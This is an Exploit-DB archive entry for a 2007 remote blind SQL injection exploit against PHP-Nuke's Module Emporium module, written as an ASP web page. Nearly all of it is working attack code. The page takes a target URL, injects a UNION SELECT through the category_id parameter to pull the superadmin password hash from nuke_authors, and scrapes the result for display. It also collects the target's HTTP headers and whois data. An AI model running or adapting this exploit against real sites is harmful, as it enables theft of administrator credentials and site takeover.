PHP-Nuke Module Emporium <= 2.3.0 - Remote SQL Injection Exploit

2007-02-19T00:00:00
ID EDB-ID:3334
Type exploitdb
Reporter ajann
Modified 2007-02-19T00:00:00

Description

PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit. CVE-2007-1034. Webapps exploit for php platform

                                        
                                            &lt;% Response.Buffer = True %&gt;
&lt;% On Error Resume Next %&gt;
&lt;% Server.ScriptTimeout = 100 %&gt;

&lt;%
'===============================================================================================
'[Script Name: Php-Nuke Module Emporium &lt;= 2.3.0 Remote Blind SQL Injection Exploit
'[Coded by   : ajann
'[Author     : ajann
'[Contact    : :(
'[S.Page     : http://www.burnwave.com/
'[ExploitName: exploit2.asp

'[Note  : exploit file name =&gt;exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================

%&gt;

&lt;%

title="Php-Nuke Module Emporium &lt;= 2.3.0 Remote Blind SQL Injection Exploit" 'Vuln Title

%&gt;
&lt;html&gt;
&lt;title&gt;&lt;% = title %&gt;&lt;/title&gt;
&lt;head&gt;
&lt;meta name="generator" content="Microsoft FrontPage 5.0"&gt;

&lt;script language="JavaScript"&gt;    
  function functionControl1(){  
        setTimeout("functionControl2()",2000);    
     }  
  
  function functionControl2(){  
            if(document.form1.field1.value==""){  
 
     alert("[Exploit Failed]=&gt;The Username and Password Didnt Take,Try Again");
        
                             }  
                        }

  function writetext() {

            if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='&lt;font face=\"Verdana\" size=\"1\" color=\"#008000\"&gt;There is a problem... The Data Didn\'t Take &lt;/font&gt;'

                            }
                 }
  function write(){  
        setTimeout("writetext()",1000);    
     }  
  
&lt;/script&gt;


&lt;/head&gt;
&lt;body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"&gt;

&lt;center&gt;
&lt;font face="Verdana" size="2" color="#008000"&gt;&lt;b&gt;&lt;a href="exploit2.asp"&gt;&lt;u&gt;&lt;% = title %&gt;
&lt;/b&gt;&lt;/u&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
&lt;table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"&gt;
  &lt;tr&gt;
    &lt;td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"&gt;
    &lt;font face="Arial" size="1"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;TARGET:&lt;/font&gt;Example:[http://x.com/path]&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
    &lt;b&gt;&lt;font face="Arial" size="1" color="#FFFFFF"&gt;USER ID:&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="1"&gt;&lt;b&gt;Example:[User 
    ID=1]&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
  &lt;/td&gt;
    &lt;td width="50%"&gt;
 &lt;center&gt;
&lt;form method="post" name="form1" action="exploit2.asp?islem=get"&gt;
&lt;input type="text" name="text1" value="http://" size="25" style="background-color: #808080"&gt;&lt;br&gt;&lt;input type="text" name="id" value="1" size="25" style="background-color: #808080"&gt;
&lt;input type="submit" value="Get"&gt;&lt;/form&gt;&lt;/center&gt;&lt;/td&gt;
  &lt;/tr&gt;

&lt;/table&gt;

&lt;div id=htmlAlani&gt;&lt;/div&gt;

&lt;%
islem = Request.QueryString("islem")    

If islem = "hata1" Then 
Response.Write "&lt;font face=""Verdana"" size=""1"" color=""#008000""&gt;There is a problem! Please complete to the whole spaces&lt;/font&gt;"
End If

If islem = "hata2" Then 
Response.Write "&lt;font face=""Verdana"" size=""1"" color=""#008000""&gt;There is a problem! Please right character use&lt;/font&gt;"
End If

If islem = "hata3" Then 
Response.Write "&lt;font face=""Verdana"" size=""1"" color=""#008000""&gt;There is a problem! Add ""http://""&lt;/font&gt;"
End If

If islem = "hata4" Then 
Response.Write "&lt;font face=""Verdana"" size=""1"" color=""#008000""&gt;There is a problem! Just Numeric Character!&lt;/font&gt;"
End If

%&gt;

&lt;%  

If islem = "get" Then

id= Request.Form("id")

file="modules.php?name=Shopping_Cart&file=category&category_id="
sql="1/1%20union%20select%200,pwd,0%20from%20nuke_authors%20where%20radminsuper=1/*"


idform = Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)

If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")

Else
If arama&gt;0 then 
Response.Redirect("exploit2.asp?islem=hata2")

Else
If arama2=0 then 
Response.Redirect("exploit2.asp?islem=hata3")

Else
IF Not IsNumeric(idform) Then
Response.Redirect("exploit2.asp?islem=hata4")

Else
%&gt; 

&lt;%

target1 = targettext+file+sql

Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
  .Open "GET" , come, FALSE
  .sEnd
  
take =  .Responsetext
End With
SET objtake = Nothing
End Function


get_username = take(target1)

getdata=InStr(get_username,"0  0/" )
username=Mid(get_username,getdata+5,90)

Dim metin
metin = take(target1)  

Dim objReg
Set objReg = New RegExp
objReg.Global = True
objReg.IgnoreCase = True

objReg.Pattern = "0""&gt;&lt;b&gt;[A-Za-z0-9ý]+&lt;/b&gt;"
Dim calistir, istediginString
Set calistir = objReg.Execute(metin)


If calistir.Count = 0 Then
     Response.write "Not True"
Else
      basusername = Replace(calistir.Item(0), "0""&gt;&lt;b&gt;" , "" )
      basusername = Replace(basusername, "&lt;/b&gt;" , "" )


End If  


 
Set bulunanlar = Nothing
Set objReg = Nothing

%&gt;

&lt;center&gt;
&lt;font face="Verdana" size="2" color="#008000"&gt; &lt;u&gt;&lt;b&gt;
ajann&lt;br&gt;&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;br&gt;

&lt;table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"&gt;
  &lt;tr&gt;
    &lt;td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    &lt;b&gt;&lt;font size="2" face="Arial"&gt;Password Admin:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
    &lt;td width="80%"&gt;
&nbsp;&lt;b&gt;&lt;font color="#C0C0C0" size="2" face="Verdana"&gt;&lt;%=basusername%&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;
  &lt;/tr&gt;


&lt;/table&gt;
&lt;/center&gt; 

  &lt;br&gt;


&lt;%
hedef = targettext
Dim objem
Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
objem.Open "GET" , hedef , false

objem.sEnd

strHTML = objem.ResponseText

header=objem.getallResponseheaders()
Response.Write "&lt;center&gt;"
Response.Write "&lt;b&gt;"
Response.Write "&lt;p&gt;&lt;font color=""#008000"" face=""Verdana"" size=""2""&gt;Header Bilgileri&lt;/font&gt;&lt;/p&gt;"
Response.Write "&lt;/b&gt;"
Response.Write "&lt;p&gt;&lt;font color=""#008000"" face=""Verdana"" size=""2""&gt;" & header & "&lt;/font&gt;&lt;/p&gt;"
Response.Write "&lt;p&gt;&lt;font color=""#008000"" face=""Verdana"" size=""2""&gt;&lt;b&gt;Whois&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;"
Response.Write "&lt;p&gt;&lt;font size=""2"" color=""#008000""&gt;Site:&lt;/font&gt;&lt;font color=""#008000"" size=""1""&gt;[google.com]&lt;/font&gt;&lt;/p&gt;"
Response.Write "&lt;/center&gt;"
Set objem=Nothing

%&gt;

&lt;center&gt;&lt;form method="post" name="form2" action="exploit2.asp?islem=whois"&gt;
  &lt;p&gt;
  &lt;input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"&gt;
  &lt;input type="submit" value="Yolla" name="B1"&gt;&lt;/p&gt;
&lt;/form&gt;&lt;/center&gt;

     
&lt;br&gt;


&lt;form method="POST" name="form2" action="#"&gt;    
&lt;input type="hidden" name="field1" size="20" value="sdfsd"&gt;     
&lt;/form&gt; 


&lt;script language="JavaScript"&gt;
write()
functionControl1()
&lt;/script&gt;

&lt;/b&gt;&lt;/font&gt;

&lt;/body&gt;
&lt;/html&gt;

&lt;%
End If
End If
End If
End If
End If

%&gt;


&lt;%
If islem = "whois" Then
site = Request.Form("whoissite")
target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain"

Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
  .Open "GET" , come, FALSE
  .sEnd
take =  .Responsetext
End With
Set objtake = Nothing
End Function

remoteadres=take(target1)

dim baslangic , bitis
baslangic = "&lt;pre&gt;"
bitis = "&lt;/pre&gt;"
dim x , abc
x = 0
abc = 0
dim sonuc
sonuc = ""

Do Until abc = 2
x = x + 1
If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then
abc = abc + 1
End If
If Mid(remoteadres,x,Len(baslangic)) = baslangic Then
abc = abc + 1
Else
If abc = 1 Then
sonuc = sonuc + Mid(remoteadres,x,1)
End If
End If
Loop

Set objtake=Nothing
 
%&gt;

&lt;center&gt;
&lt;b&gt;&lt;font color="#008000" face="Verdana" size="2"&gt;Whois Bilgileri&lt;/font&gt;&lt;/b&gt;&lt;p&gt;
&lt;textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000"&gt;
&lt;% Response.Write "&lt;" & sonuc %&gt;
&lt;/textarea&gt;
&lt;/p&gt;
&lt;/center&gt;

&lt;center&gt;&lt;form method="post" name="form2" action="exploit2.asp?islem=whois"&gt;
  &lt;p&gt;
  &lt;input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"&gt;
  &lt;input type="submit" value="Yolla" name="B1"&gt;&lt;/p&gt;
&lt;/form&gt;&lt;/center&gt;



&lt;%
End If
%&gt;

&lt;%
Response.Write "&lt;br&gt;"
Response.Write "&lt;center&gt;"
Response.Write "&lt;pre class=""info""&gt;"
Response.Write "&lt;font color=""#C0C0C0"" size=""1""&gt;"
Response.Write "En iyi "
Response.Write "&lt;/font&gt;"
Response.Write "&lt;font size=""1"" color=""#808080""&gt;&lt;span class=""info2""&gt;"
Response.Write "1152x864 "
Response.Write "&lt;/span&gt;&lt;/font&gt;"
Response.Write "&lt;font color=""#C0C0C0"" size=""1""&gt;çözünürlük ve "
Response.Write "&lt;span class=""info2""&gt;&lt;font size=""1"" color=""#808080""&gt;Firefox &lt;/font&gt;&lt;/span&gt;"
Response.Write "ile görüntülünebilir.&lt;/font&gt;&lt;/pre&gt;"

Response.Write "&lt;pre class=""info""&gt;"
Response.Write "&lt;font color=""#C0C0C0"" size=""1""&gt;"
Response.Write "Exploit coded by "
Response.Write "&lt;/font&gt;"
Response.Write "&lt;font size=""1"" color=""#808080""&gt;&lt;span class=""info2""&gt;"
Response.Write "ajann"
Response.Write "&lt;/span&gt;&lt;/font&gt;"
Response.Write "&lt;/center&gt;"

%&gt;

# milw0rm.com [2007-02-19]